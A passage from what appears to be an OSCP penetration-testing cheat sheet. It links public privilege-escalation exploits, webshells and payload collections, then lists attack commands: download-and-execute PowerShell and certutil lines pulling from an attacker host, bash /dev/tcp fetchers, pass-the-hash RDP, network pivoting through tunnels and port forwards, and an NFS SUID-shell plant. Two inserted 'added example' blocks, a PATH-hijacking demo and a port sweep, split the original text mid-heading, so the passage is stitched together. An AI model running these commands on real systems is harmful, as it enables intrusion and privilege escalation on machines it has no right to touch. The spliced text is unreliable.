|\n| CVE-2023-32233 | Use-After-Free in Netfilter nf_tables LPE | https://github.com/Liuk3r/CVE-2023-32233 |\n| CVE-2023-32629, CVE-2023-2640 | GameOverlay Ubuntu Kernel Exploit LPE (0-day) | https://twitter.com/liadeliyahu/status/1684841527959273472?s=09 |\n| CVE-2023-36874 | Windows Error Reporting Service LPE (0-day) | https://github.com/Wh04m1001/CVE-2023-36874 |\n| CVE-2023-51467, CVE-2023-49070 | Apache OFBiz Authentication Bypass | https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass |\n| CVE-2023-7028 | GitLab Account Takeover | https://github.com/V1lu0/CVE-2023-7028 |\n| CVE-2023-7028 | GitLab Account Takeover | https://github.com/Vozec/CVE-2023-7028 |\n| CVE-2024-0582 | Ubuntu Linux Kernel io_uring LPE | https://github.com/ysanatomic/io_uring_LPE-CVE-2024-0582 |\n| CVE-2024-1086 | Use-After-Free Linux Kernel Netfilter nf_tables LPE | https://github.com/Notselwyn/CVE-2024-1086 |\n| CVE-2024-4577 | PHP-CGI Argument Injection Vulnerability RCE | https://github.com/watchtowrlabs/CVE-2024-4577 |\n| CVE-2024-30088 | Microsoft Windows LPE | https://github.com/tykawaii98/CVE-2024-30088 |\n| n/a | dompdf RCE (0-day) | https://github.com/positive-security/dompdf-rce |\n| n/a | dompdf XSS to RCE (0-day) | https://positive.security/blog/dompdf-rce |\n| n/a | StorSvc LPE | https://github.com/blackarrowsec/redteam-research/tree/master/LPE%20via%20StorSvc |\n| n/a | ADCSCoercePotato | https://github.com/decoder-it/ADCSCoercePotato |\n| n/a | CoercedPotato LPE | https://github.com/Prepouce/CoercedPotato |\n| n/a | DCOMPotato LPE | https://github.com/zcgonvh/DCOMPotato |\n| n/a | DeadPotato LPE | https://github.com/lypd0/DeadPotato |\n| n/a | GenericPotato LPE | https://github.com/micahvandeusen/GenericPotato |\n| n/a | GodPotato LPE | https://github.com/BeichenDream/GodPotato |\n| n/a | JuicyPotato LPE | https://github.com/ohpe/juicy-potato |\n| n/a | JuicyPotatoNG LPE | https://github.com/antonioCoco/JuicyPotatoNG |\n| n/a | MultiPotato LPE | 
https://github.com/S3cur3Th1sSh1t/MultiPotato |\n| n/a | RemotePotato0 PE | https://github.com/antonioCoco/RemotePotato0 |\n| n/a | RoguePotato LPE | https://github.com/antonioCoco/RoguePotato |\n| n/a | RottenPotatoNG LPE | https://github.com/breenmachine/RottenPotatoNG |\n| n/a | SharpEfsPotato LPE | https://github.com/bugch3ck/SharpEfsPotato |\n| n/a | SigmaPotato LPE | https://github.com/tylerdotrar/SigmaPotato |\n| n/a | SweetPotato LPE | https://github.com/CCob/SweetPotato |\n| n/a | SweetPotato LPE | https://github.com/uknowsec/SweetPotato |\n| n/a | S4UTomato LPE | https://github.com/wh0amitz/S4UTomato |\n| n/a | PrintSpoofer LPE (1) | https://github.com/dievus/printspoofer |\n| n/a | PrintSpoofer LPE (2) | https://github.com/itm4n/PrintSpoofer |\n| n/a | Shocker Container Escape | https://github.com/gabrtv/shocker |\n| n/a | SystemNightmare PE | https://github.com/GossiTheDog/SystemNightmare |\n| n/a | NoFilter LPE | https://github.com/deepinstinct/NoFilter |\n| n/a | OfflineSAM LPE | https://github.com/gtworek/PSBits/tree/master/OfflineSAM |\n| n/a | OfflineAddAdmin2 LPE | https://github.com/gtworek/PSBits/tree/master/OfflineSAM/OfflineAddAdmin2 |\n| n/a | Kernelhub | https://github.com/Ascotbe/Kernelhub |\n| n/a | Windows Exploits | https://github.com/SecWiki/windows-kernel-exploits |\n| n/a | Pre-compiled Windows Exploits | https://github.com/abatchy17/WindowsExploits |\n\n### Payloads\n\n| Name | URL |\n| --- | --- |\n| Payload Box | https://github.com/payloadbox |\n| PayloadsAllTheThings | https://github.com/swisskyrepo/PayloadsAllTheThings |\n| PHPGGC | https://github.com/ambionics/phpggc |\n| PHP-Reverse-Shell | https://github.com/ivan-sincek/php-reverse-shell |\n| webshell | https://github.com/tennc/webshell |\n| Web-Shells | https://github.com/TheBinitGhimire/Web-Shells |\n\n### Wordlists\n\n| Name | URL |\n| --- | --- |\n| bopscrk | https://github.com/R3nt0n/bopscrk |\n| CeWL | https://github.com/digininja/cewl |\n| COOK | 
https://github.com/giteshnxtlvl/cook |\n| CUPP | https://github.com/Mebus/cupp |\n| Kerberos Username Enumeration | https://github.com/attackdebris/kerberos_enum_userlists |\n| SecLists | https://github.com/danielmiessler/SecLists |\n| Username Anarchy | https://github.com/urbanadventurer/username-anarchy |\n\n### Reporting\n\n| Name | URL |\n| --- | --- |\n| OSCP-Note-Vault | https://github.com/0xsyr0/OSCP-Note-Vault |\n| SysReptor | https://github.com/Syslifters/sysreptor |\n| SysReptor OffSec Reporting | https://github.com/Syslifters/OffSec-Reporting |\n| SysReptor Portal | https://oscp.sysreptor.com/oscp/signup/ |\n\n### Social Media Resources\n\n| Name | URL |\n| --- | --- |\n| OSCP Guide 01/12 – My Exam Experience | https://www.youtube.com/watch?v=9mrf-WyzkpE\u0026list=PLJnLaWkc9xRgOyupMhNiVFfgvxseWDH5x |\n| Rana Khalil | https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/ |\n| HackTricks | https://book.hacktricks.xyz/ |\n| HackTricks Local Windows Privilege Escalation Checklist | https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation |\n| Hacking Articles | https://www.hackingarticles.in/ |\n| Rednode Windows Privilege Escalation | https://rednode.com/privilege-escalation/windows-privilege-escalation-cheat-sheet/ |\n| OSCP Cheat Sheet by xsudoxx | https://github.com/xsudoxx/OSCP |\n| OSCP-Tricks-2023 by Rodolfo Marianocy | https://github.com/rodolfomarianocy/OSCP-Tricks-2023 |\n| IppSec (YouTube) | https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA |\n| IppSec.rocks | https://ippsec.rocks/?# |\n| 0xdf | https://0xdf.gitlab.io/ |\n\n## Commands\n\n### Basics\n\n#### curl\n\n```c\ncurl -v http://\u003cDOMAIN\u003e                                                        // verbose output\ncurl -X POST http://\u003cDOMAIN\u003e                                                   // use POST method\ncurl -X PUT http://\u003cDOMAIN\u003e                                                    // use PUT method\ncurl 
--path-as-is http://\u003cDOMAIN\u003e/../../../../../../etc/passwd                 // use --path-as-is to handle /../ or /./ in the given URL\ncurl --proxy http://127.0.0.1:8080 http://\u003cDOMAIN\u003e                           // send the request through a proxy (e.g. Burp)\ncurl -F myFile=@\u003cFILE\u003e http://\u003cRHOST\u003e                                          // file upload\ncurl${IFS}\u003cLHOST\u003e/\u003cFILE\u003e                                                       // Internal Field Separator (IFS) example, for filters that block spaces\n```\n\n#### File Transfer\n\n##### Certutil\n\n```c\ncertutil -urlcache -split -f \"http://\u003cLHOST\u003e/\u003cFILE\u003e\" \u003cFILE\u003e\n```\n\n##### Netcat\n\n```c\nnc -lnvp \u003cLPORT\u003e \u003c \u003cFILE\u003e\nnc \u003cRHOST\u003e \u003cRPORT\u003e \u003e \u003cFILE\u003e\n```\n\n##### Impacket\n\n```c\nsudo impacket-smbserver \u003cSHARE\u003e ./\nsudo impacket-smbserver \u003cSHARE\u003e . -smb2support\ncopy * \\\\\u003cLHOST\u003e\\\u003cSHARE\u003e\n```\n\n##### PowerShell\n\n```c\niwr \u003cLHOST\u003e/\u003cFILE\u003e -o \u003cFILE\u003e\nIEX(IWR http://\u003cLHOST\u003e/\u003cFILE\u003e -UseBasicParsing)\npowershell -command Invoke-WebRequest -Uri http://\u003cLHOST\u003e:\u003cLPORT\u003e/\u003cFILE\u003e -Outfile C:\\\\temp\\\\\u003cFILE\u003e\n```\n\n##### Bash only\n\n###### wget version\n\nPaste directly to the shell.\n\n```c\nfunction __wget() {\n    : ${DEBUG:=0}\n    local URL=$1\n    local tag=\"Connection: close\"\n    local mark=0\n\n    if [ -z \"${URL}\" ]; then\n        printf \"Usage: %s \\\"URL\\\" [e.g.: %s http://www.google.com/]\" \\\n               \"${FUNCNAME[0]}\" \"${FUNCNAME[0]}\"\n        return 1;\n    fi\n    read proto server path \u003c\u003c\u003c$(echo ${URL//// })\n    DOC=/${path// //}\n    HOST=${server//:*}\n    PORT=${server//*:}\n    [[ x\"${HOST}\" == x\"${PORT}\" ]] \u0026\u0026 PORT=80\n    [[ $DEBUG -eq 1 ]] \u0026\u0026 echo \"HOST=$HOST\"\n    [[ $DEBUG -eq 1 ]] \u0026\u0026 echo \"PORT=$PORT\"\n    [[ $DEBUG -eq 
1 ]] \u0026\u0026 echo \"DOC =$DOC\"\n\n    exec 3\u003c\u003e/dev/tcp/${HOST}/$PORT\n    echo -en \"GET ${DOC} HTTP/1.1\\r\\nHost: ${HOST}\\r\\n${tag}\\r\\n\\r\\n\" \u003e\u00263\n    while read line; do\n        [[ $mark -eq 1 ]] \u0026\u0026 echo $line\n        if [[ \"${line}\" =~ \"${tag}\" ]]; then\n            mark=1\n        fi\n    done \u003c\u00263\n    exec 3\u003e\u0026-\n}\n```\n\nThe loop only starts printing after it sees a response header matching \"Connection: close\"; if the server does not echo that header, nothing is printed and the curl version below (which stops at the blank line ending the headers) should be used instead.\n\n```c\n__wget http://\u003cLHOST\u003e/\u003cFILE\u003e\n```\n\n###### curl version\n\n```c\nfunction __curl() {\n  read proto server path \u003c\u003c\u003c$(echo ${1//// })\n  DOC=/${path// //}\n  HOST=${server//:*}\n  PORT=${server//*:}\n  [[ x\"${HOST}\" == x\"${PORT}\" ]] \u0026\u0026 PORT=80\n\n  exec 3\u003c\u003e/dev/tcp/${HOST}/$PORT\n  echo -en \"GET ${DOC} HTTP/1.0\\r\\nHost: ${HOST}\\r\\n\\r\\n\" \u003e\u00263\n  (while read line; do\n   [[ \"$line\" == $'\\r' ]] \u0026\u0026 break\n  done \u0026\u0026 cat) \u003c\u00263\n  exec 3\u003e\u0026-\n}\n```\n\n```c\n__curl http://\u003cLHOST\u003e/\u003cFILE\u003e \u003e \u003cOUTPUT_FILE\u003e\n```\n\n#### FTP\n\n```c\nftp \u003cRHOST\u003e\nftp -A \u003cRHOST\u003e\nwget -r ftp://anonymous:anonymous@\u003cRHOST\u003e\n```\n\n#### Kerberos\n\n```c\nsudo apt-get install krb5-kdc\n```\n\n##### Ticket Handling\n\n```c\nimpacket-getTGT \u003cDOMAIN\u003e/\u003cUSERNAME\u003e:'\u003cPASSWORD\u003e'\nexport KRB5CCNAME=\u003cFILE\u003e.ccache\nexport KRB5CCNAME=`realpath \u003cFILE\u003e.ccache`    // use the absolute path so tools run from other directories still find the cache\n```\n\n##### Kerberos related Files\n\n```c\n/etc/krb5.conf                   // kerberos configuration file location\nkinit \u003cUSERNAME\u003e                 // creating ticket request\nklist                            // show available kerberos tickets\nkdestroy                         // delete cached kerberos tickets\n.k5login                         // lists the kerberos principals allowed to log in as this user (place in home directory)\nkrb5.keytab                      // \"key table\" file for one or more principals\nkadmin                       
    // kerberos administration console\nadd_principal \u003cEMAIL\u003e            // add a new principal to the kerberos database\nksu                              // kerberized su: switch user using kerberos authentication instead of a password\nklist -k /etc/krb5.keytab        // lists keytab file\nkadmin -p kadmin/\u003cEMAIL\u003e -k -t /etc/krb5.keytab    // authenticate to kadmin with a keytab instead of a password\n```\n\n##### Ticket Conversion\n\n###### kirbi to ccache\n\n```c\nbase64 -d \u003cUSERNAME\u003e.kirbi.b64 \u003e \u003cUSERNAME\u003e.kirbi\nimpacket-ticketConverter \u003cUSERNAME\u003e.kirbi \u003cUSERNAME\u003e.ccache\nexport KRB5CCNAME=`realpath \u003cUSERNAME\u003e.ccache`\n```\n\n###### ccache to kirbi\n\n```c\nimpacket-ticketConverter \u003cUSERNAME\u003e.ccache \u003cUSERNAME\u003e.kirbi\nbase64 -w0 \u003cUSERNAME\u003e.kirbi \u003e \u003cUSERNAME\u003e.kirbi.base64\n```\n\n#### Ligolo-ng\n\n\u003e https://github.com/nicocha30/ligolo-ng\n\n##### Download Proxy and Agent\n\n```c\nwget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-ng_agent_0.4.3_Linux_64bit.tar.gz\nwget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-ng_proxy_0.4.3_Linux_64bit.tar.gz\n```\n\n##### Prepare Tunnel Interface\n\n```c\nsudo ip tuntap add user $(whoami) mode tun ligolo\n```\n\n```c\nsudo ip link set ligolo up\n```\n\n##### Setup Proxy on Attacker Machine\n\n```c\n./proxy -laddr \u003cLHOST\u003e:443 -selfcert\n```\n\n##### Setup Agent on Target Machine\n\n```c\n./agent -connect \u003cLHOST\u003e:443 -ignore-cert\n```\n\n##### Configure Session\n\n```c\nligolo-ng » session\n```\n\n```c\n[Agent : user@target] » ifconfig\n```\n\n```c\nsudo ip r add 172.16.1.0/24 dev ligolo\n```\n\n```c\n[Agent : user@target] » start\n```\n\n###### Port Forwarding\n\n```c\n[Agent : user@target] » listener_add --addr \u003cRHOST\u003e:\u003cLPORT\u003e --to \u003cLHOST\u003e:\u003cLPORT\u003e --tcp\n```\n\n#### Linux\n\n##### CentOS\n\n```c\ndoas -u \u003cUSERNAME\u003e /bin/sh\n```\n\n##### Environment 
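Variables

Why prepending a writable directory to PATH matters, as an added example that is not part of the original cheat sheet: a program that runs with higher privileges (SUID binary, cron job, sudo rule) and calls a command by bare name resolves that name through PATH, so a planted file of the same name runs instead of the real one. The script below plants a fake `ls`, prepends its directory to PATH, shows which file the shell now resolves and contrasts it with a caller that uses an absolute path. The temporary directory, the command name `ls` and the victim's `sh -c 'ls /'` call are constructed for the demo.

```bash
#!/usr/bin/env bash
# Added example: PATH hijacking, the reason behind `export PATH=$(pwd):$PATH`.
# A privileged program that calls "ls" (or "service", "cp", ...) without an
# absolute path takes the first match in PATH; if we control an earlier
# directory, our file runs with the program's privileges.

# plant_fake_binary DIR NAME: write DIR/NAME, a shell script that announces itself
plant_fake_binary() {
  local dir="$1" name="$2"
  mkdir -p "$dir"
  printf '#!/bin/sh\necho "hijacked: %s executed as $(id -un)"\n' "$name" > "$dir/$name"
  chmod 755 "$dir/$name"
}

# resolve_with_path DIR NAME: which file does a fresh shell run for NAME once DIR is first in PATH?
resolve_with_path() {
  local dir="$1" name="$2"
  PATH="$dir:$PATH" sh -c 'command -v "$0"' "$name"
}

# run_victim DIR: stand-in for the vulnerable privileged program (constructed; it only calls `ls /`)
run_victim() {
  local dir="$1"
  PATH="$dir:$PATH" sh -c 'ls /'
}

# run_victim_hardened DIR: the same call with an absolute path, which PATH cannot redirect
run_victim_hardened() {
  local dir="$1"
  PATH="$dir:$PATH" sh -c '/bin/ls / >/dev/null && echo "real ls ran"'
}

# path_hijack_demo: plant, resolve, trigger both callers, clean up
path_hijack_demo() {
  local dir
  dir=$(mktemp -d)
  plant_fake_binary "$dir" ls
  resolve_with_path "$dir" ls
  run_victim "$dir"
  run_victim_hardened "$dir"
  rm -rf "$dir"
}
```

On a real target the planted file is usually a reverse shell or `chmod u+s /bin/bash`, and the trigger is whatever makes the privileged program run; `strings` or `ltrace` on the binary shows which bare command names it calls.


##### Prepending to Environment 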
Variables\n\n```c\nexport PATH=`pwd`:$PATH\n```\n\n##### gcc\n\n```c\ngcc (--static) -m32 -Wl,--hash-style=both exploit.c -o exploit\ni686-w64-mingw32-gcc -o main32.exe main.c\nx86_64-w64-mingw32-gcc -o main64.exe main.c\n```\n\n##### getfacl\n\n```c\ngetfacl \u003cLOCAL_DIRECTORY\u003e\n```\n\n##### iconv\n\n```c\necho \"\u003cCOMMAND\u003e\" | iconv -t UTF-16LE | base64 -w 0\necho \"\u003cCOMMAND\u003e\" | iconv -f UTF-8 -t UTF-16LE | base64 -w0\niconv -f ASCII -t UTF-16LE \u003cFILE\u003e.txt | base64 | tr -d \"\\n\"\n```\n\n##### vi\n\n```c\n:w !sudo tee %    # save file with elevated privileges without exiting\n```\n\n##### Windows Command Formatting\n\n```c\necho \"\u003cCOMMAND\u003e\" | iconv -f UTF-8 -t UTF-16LE | base64 -w0\n```\n\n#### Microsoft Windows\n\n##### dir\n\n```c\ndir /a\ndir /a:d\ndir /a:h\ndir flag* /s /p\ndir /s /b *.log\n```\n\n#### PHP Webserver\n\n```c\nsudo php -S 127.0.0.1:80\n```\n\n#### Ping\n\n```c\nping -c 1 \u003cRHOST\u003e\nping -n 1 \u003cRHOST\u003e\n```\n\n#### Port Forwarding\n\n##### Chisel\n\n| System             | IP address     |\n| ------------------ | -------------- |\n| LHOST              | 192.168.50.10  |\n| APPLICATION SERVER | 192.168.100.10 |\n| DATABASE SERVER    | 10.10.100.20   |\n| WINDOWS HOST       | 172.16.50.10   |\n\n###### Reverse Pivot\n\n- LHOST \u003c APPLICATION SERVER\n\n###### LHOST\n\n```c\n./chisel server -p 9002 -reverse -v\n```\n\n###### APPLICATION SERVER\n\n```c\n./chisel client 192.168.50.10:9002 R:3000:127.0.0.1:3000\n```\n\n###### SOCKS5 / Proxychains Configuration\n\n- LHOST \u003e APPLICATION SERVER \u003e NETWORK\n\n###### LHOST\n\n```c\n./chisel server -p 9002 -reverse -v\n```\n\n###### APPLICATION SERVER\n\n```c\n./chisel client 192.168.50.10:9002 R:socks\n```\n\n##### Ligolo-ng\n\n\u003e https://github.com/nicocha30/ligolo-ng\n\n| System             | IP address     |\n| ------------------ | -------------- |\n| LHOST              | 192.168.50.10  |\n| APPLICATION SERVER | 
192.168.100.10 |\n| DATABASE SERVER    | 10.10.100.20   |\n| WINDOWS HOST       | 172.16.50.10   |\n\n- LHOST \u003e APPLICATION SERVER \u003e NETWORK\n\n###### Download Proxy and Agent\n\n\u003e https://github.com/nicocha30/ligolo-ng/releases\n\n```c\nwget https://github.com/nicocha30/ligolo-ng/releases/download/v0.6.2/ligolo-ng_agent_0.6.2_Linux_64bit.tar.gz\nwget https://github.com/nicocha30/ligolo-ng/releases/download/v0.6.2/ligolo-ng_proxy_0.6.2_Linux_64bit.tar.gz\n```\n\n###### Prepare Tunnel Interface\n\n```c\nsudo ip tuntap add user $(whoami) mode tun ligolo\n```\n\n```c\nsudo ip link set ligolo up\n```\n\n###### Setup Proxy on LHOST\n\n```c\n./proxy -laddr 192.168.50.10:443 -selfcert\n```\n\n###### Setup Agent on APPLICATION SERVER\n\n```c\n./agent -connect 192.168.50.10:443 -ignore-cert\n```\n\n###### Configure Session\n\n```c\nligolo-ng » session\n```\n\n```c\n[Agent : user@target] » ifconfig\n```\n\n```c\nsudo ip r add 172.16.50.0/24 dev ligolo\n```\n\n```c\n[Agent : user@target] » start\n```\n\n###### Port Forwarding\n\n- LHOST \u003c APPLICATION SERVER \u003e DATABASE SERVER\n\n```c\n[Agent : user@target] » listener_add --addr 10.10.100.20:2345 --to 192.168.50.10:2345 --tcp\n```\n\n##### Socat\n\n| System             | IP address     |\n| ------------------ | -------------- |\n| LHOST              | 192.168.50.10  |\n| APPLICATION SERVER | 192.168.100.10 |\n| DATABASE SERVER    | 10.10.100.20   |\n| WINDOWS HOST       | 172.16.50.10   |\n\n- LHOST \u003e APPLICATION SERVER \u003e DATABASE SERVER\n\n###### APPLICATION SERVER\n\n```c\nip a\nip r\nsocat -ddd TCP-LISTEN:2345,fork TCP:10.10.100.20:5432\n```\n\n###### LHOST\n\n```c\npsql -h 192.168.100.10 -p 2345 -U postgres\n```\n\n##### SSH Tunneling\n\n###### Local Port Forwarding\n\n| System | IP address |\n| --- | --- |\n| LHOST | 192.168.50.10 |\n| APPLICATION SERVER | 192.168.100.10 |\n| DATABASE SERVER | 10.10.100.20 |\n| WINDOWS HOST | 172.16.50.10 |\n\n- LHOST \u003e APPLICATION SERVER 
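> DATABASE SERVER > WINDOWS HOST

The `nc -zv` sweep used on the APPLICATION SERVER below assumes nc exists on the pivot. As an added example that is not part of the original cheat sheet, the following bash-only sweep does the same job with bash's `/dev/tcp` redirection and `timeout`, so it works on a minimal box. The 172.16.50.0/24 prefix, the DATABASE SERVER address and the ports are taken from the scenario table; everything else is assumed.

```bash
#!/usr/bin/env bash
# Added example: bash-only TCP sweep from a pivot host that has neither nmap
# nor nc. Bash opens /dev/tcp/HOST/PORT as a redirection; `timeout` caps each
# attempt so filtered hosts do not hang the loop.

# port_open HOST PORT [TIMEOUT_S]: 0 if a TCP handshake completes, non-zero otherwise
port_open() {
  local host="$1" port="$2" t="${3:-1}"
  timeout "$t" bash -c 'exec 3<>"/dev/tcp/$0/$1"' "$host" "$port" 2>/dev/null
}

# sweep_subnet PREFIX PORT [FIRST] [LAST]: one line "IP:PORT open" per responsive host
sweep_subnet() {
  local prefix="$1" port="$2" i="${3:-1}" last="${4:-254}"
  while [ "$i" -le "$last" ]; do
    if port_open "$prefix.$i" "$port"; then echo "$prefix.$i:$port open"; fi
    i=$((i + 1))
  done
}

# scan_ports HOST PORT...: check a handful of service ports on one host
scan_ports() {
  local host="$1" p
  shift
  for p in "$@"; do
    if port_open "$host" "$p"; then echo "$host:$p open"; else echo "$host:$p closed"; fi
  done
}

# usage from the APPLICATION SERVER in the scenario:
#   sweep_subnet 172.16.50 445          # find SMB hosts behind the pivot
#   scan_ports 10.10.100.20 22 5432     # confirm SSH and PostgreSQL on the DATABASE SERVER
```

Keep the timeout at one second for hosts on the same segment; raise it when the pivot is several hops away, otherwise live hosts are reported as closed.


Pivot path for the commands below: LHOST > APPLICATION SERVER 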
\u003e DATABASE SERVER \u003e WINDOWS HOST\n\n###### APPLICATION SERVER\n\n```c\npython3 -c 'import pty;pty.spawn(\"/bin/bash\")'\nssh \u003cUSERNAME\u003e@192.168.100.10\nip a\nip r\nfor i in $(seq 1 254); do nc -zv -w 1 172.16.50.$i 445; done\nssh -N -L 0.0.0.0:4455:172.16.50.10:445 \u003cUSERNAME\u003e@10.10.100.20\n```\n\n###### LHOST\n\n```c\nsmbclient -p 4455 //192.168.100.10/\u003cSHARE\u003e -U \u003cUSERNAME\u003e --password=\u003cPASSWORD\u003e    // connect to the forwarded port on the APPLICATION SERVER\n```\n\n###### Dynamic Port Forwarding\n\n| System | IP address |\n| --- | --- |\n| LHOST | 192.168.50.10 |\n| APPLICATION SERVER | 192.168.100.10 |\n| DATABASE SERVER | 10.10.100.20 |\n| WINDOWS HOST | 172.16.50.10 |\n\n- LHOST \u003e APPLICATION SERVER \u003e DATABASE SERVER \u003e WINDOWS HOST\n\n###### APPLICATION SERVER\n\n```c\npython3 -c 'import pty;pty.spawn(\"/bin/bash\")'\nssh -N -D 0.0.0.0:9999 \u003cUSERNAME\u003e@10.10.100.20\n```\n\n###### LHOST\n\n```c\nsudo ss -tulpn\ntail /etc/proxychains4.conf\nsocks5 192.168.100.10 9999    // the SOCKS listener is on the APPLICATION SERVER\nproxychains smbclient //172.16.50.10/\u003cSHARE\u003e -U \u003cUSERNAME\u003e --password=\u003cPASSWORD\u003e\n```\n\n###### Remote Port Forwarding\n\n| System | IP address |\n| --- | --- |\n| LHOST | 192.168.50.10 |\n| APPLICATION SERVER | 192.168.100.10 |\n| DATABASE SERVER | 10.10.100.20 |\n| WINDOWS HOST | 172.16.50.10 |\n\n- LHOST \u003c-\u003e FIREWALL \u003c-\u003e APPLICATION SERVER \u003e DATABASE SERVER \u003e WINDOWS HOST\n\n###### LHOST\n\n```c\nsudo systemctl start ssh\nsudo ss -tulpn\n```\n\n###### APPLICATION SERVER\n\n```c\npython3 -c 'import pty; pty.spawn(\"/bin/bash\")'\nssh -N -R 127.0.0.1:2345:10.10.100.20:5432 \u003cUSERNAME\u003e@192.168.50.10\n```\n\n###### LHOST\n\n```c\npsql -h 127.0.0.1 -p 2345 -U postgres\n```\n\n###### Remote Dynamic Port Forwarding\n\n| System             | IP address     |\n| ------------------ | -------------- |\n| LHOST              | 192.168.50.10  |\n| APPLICATION SERVER | 192.168.100.10 |\n| DATABASE SERVER    | 10.10.100.20   
|\n| WINDOWS HOST       | 172.16.50.10   |\n\n- LHOST \u003c FIREWALL \u003c APPLICATION SERVER \u003e NETWORK\n\n###### APPLICATION SERVER\n\n```c\npython3 -c 'import pty; pty.spawn(\"/bin/bash\")'\nssh -N -R 9998 \u003cUSERNAME\u003e@192.168.50.10\n```\n\n###### LHOST\n\n```c\nsudo ss -tulpn\ntail /etc/proxychains4.conf\nsocks5 127.0.0.1 9998\nproxychains nmap -vvv -sT --top-ports=20 -Pn -n 10.10.100.20\n```\n\n##### sshuttle\n\n| System             | IP address     |\n| ------------------ | -------------- |\n| LHOST              | 192.168.50.10  |\n| APPLICATION SERVER | 192.168.100.10 |\n| DATABASE SERVER    | 10.10.100.20   |\n| WINDOWS HOST       | 172.16.50.10   |\n\n- LHOST \u003e APPLICATION SERVER \u003e NETWORK\n\n###### APPLICATION SERVER\n\n```c\nsocat TCP-LISTEN:2222,fork TCP:10.10.100.20:22\n```\n\n###### LHOST\n\n```c\nsshuttle -r \u003cUSERNAME\u003e@192.168.100.10:2222 10.10.100.0/24 172.16.50.0/24\nsmbclient -L //172.16.50.10/ -U \u003cUSERNAME\u003e --password=\u003cPASSWORD\u003e\n```\n\n##### ssh.exe\n\n| System              | IP address     |\n| ------------------- | -------------- |\n| LHOST               | 192.168.50.10  |\n| APPLICATION SERVER  | 192.168.100.10 |\n| WINDOWS JUMP SERVER | 192.168.100.20 |\n| DATABASE SERVER     | 10.10.100.20   |\n| WINDOWS HOST        | 172.16.50.10   |\n\n- LHOST \u003c FIREWALL \u003c WINDOWS JUMP SERVER \u003e NETWORK\n\n###### LHOST\n\n```c\nsudo systemctl start ssh\nxfreerdp /u:\u003cUSERNAME\u003e /p:\u003cPASSWORD\u003e /v:192.168.100.20\n```\n\n###### WINDOWS JUMP SERVER\n\n```c\nwhere ssh\nC:\\Windows\\System32\\OpenSSH\\ssh.exe\nC:\\Windows\\System32\\OpenSSH\u003e ssh -N -R 9998 \u003cUSERNAME\u003e@192.168.50.10\n```\n\n###### LHOST\n\n```c\nss -tulpn\ntail /etc/proxychains4.conf\nsocks5 127.0.0.1 9998\nproxychains psql -h 10.10.100.20 -U postgres\n```\n\n##### Plink\n\n| System              | IP address     |\n| ------------------- | -------------- |\n| LHOST               | 192.168.50.10  
|\n| APPLICATION SERVER  | 192.168.100.10 |\n| WINDOWS JUMP SERVER | 192.168.100.20 |\n| DATABASE SERVER     | 10.10.100.20   |\n| WINDOWS HOST        | 172.16.50.10   |\n\n- LHOST \u003c FIREWALL \u003c WINDOWS JUMP SERVER\n\n###### LHOST\n\n```c\nfind / -name plink.exe 2\u003e/dev/null\n/usr/share/windows-resources/binaries/plink.exe\n```\n\n###### WINDOWS JUMP SERVER\n\n```c\nplink.exe -ssh -l \u003cUSERNAME\u003e -pw \u003cPASSWORD\u003e -R 127.0.0.1:9833:127.0.0.1:3389 192.168.50.10\n```\n\n###### LHOST\n\n```c\nss -tulpn\nxfreerdp /u:\u003cUSERNAME\u003e /p:\u003cPASSWORD\u003e /v:127.0.0.1:9833\n```\n\n##### Netsh\n\n| System              | IP address     |\n| ------------------- | -------------- |\n| LHOST               | 192.168.50.10  |\n| APPLICATION SERVER  | 192.168.100.10 |\n| WINDOWS JUMP SERVER | 192.168.100.20 |\n| DATABASE SERVER     | 10.10.100.20   |\n| WINDOWS HOST        | 172.16.50.10   |\n\n- LHOST \u003c FIREWALL \u003c WINDOWS JUMP SERVER \u003e DATABASE SERVER\n\n###### LHOST\n\n```c\nxfreerdp /u:\u003cUSERNAME\u003e /p:\u003cPASSWORD\u003e /v:192.168.100.20\n```\n\n###### WINDOWS JUMP SERVER\n\n```c\nnetsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.50.10 connectport=22 connectaddress=10.10.100.20\nnetstat -anp TCP | findstr \"2222\"\nnetsh interface portproxy show all\nnetsh advfirewall firewall add rule name=\"port_forward_ssh_2222\" protocol=TCP dir=in localip=192.168.50.10 localport=2222 action=allow\n```\n\n###### LHOST\n\n```c\nsudo nmap -sS 192.168.50.10 -Pn -n -p2222\nssh database_admin@192.168.50.10 -p2222\n```\n\n###### WINDOWS JUMP SERVER\n\n```c\nnetsh advfirewall firewall delete rule name=\"port_forward_ssh_2222\"\nnetsh interface portproxy del v4tov4 listenport=2222 listenaddress=192.168.50.10\n```\n\n#### Python Webserver\n\n```c\nsudo python -m SimpleHTTPServer 80\nsudo python3 -m http.server 80\n```\n\n#### RDP\n\n```c\nxfreerdp /v:\u003cRHOST\u003e /u:\u003cUSERNAME\u003e /p:\u003cPASSWORD\u003e 
/cert-ignore\nxfreerdp /v:\u003cRHOST\u003e /u:\u003cUSERNAME\u003e /p:\u003cPASSWORD\u003e /d:\u003cDOMAIN\u003e /cert-ignore\nxfreerdp /v:\u003cRHOST\u003e /u:\u003cUSERNAME\u003e /p:\u003cPASSWORD\u003e /dynamic-resolution +clipboard\nxfreerdp /v:\u003cRHOST\u003e /u:\u003cUSERNAME\u003e /d:\u003cDOMAIN\u003e /pth:'\u003cHASH\u003e' /dynamic-resolution +clipboard\nxfreerdp /v:\u003cRHOST\u003e /dynamic-resolution +clipboard /tls-seclevel:0 -sec-nla\nrdesktop \u003cRHOST\u003e\n```\n\n#### showmount\n\n```c\n/usr/sbin/showmount -e \u003cRHOST\u003e\nsudo showmount -e \u003cRHOST\u003e\nchown root:root sid-shell; chmod +s sid-shell    // on an NFS export with no_root_squash: mount it as root, plant a SUID shell, run it from the target\n```\n\n#### SMB\n\n```c\nmount.cifs //\u003cRHOST\u003e/\u003cSHARE\u003e /mnt/remote\nguestmount --add '/\u003cMOUNTPOINT\u003e/\u003cDIRECTORY/FILE\u003e' --inspector --ro /mnt/\u003cMOUNT\u003e -v\n```\n\n#### smbclient\n\n```c\nsmbclient -L \\\\\u003cRHOST\u003e\\ -N\nsmbclient -L //\u003cRHOST\u003e/ -N\nsmbclient -L ////\u003cRHOST\u003e/ -N\nsmbclient -L //\u003cRHOST\u003e// -U 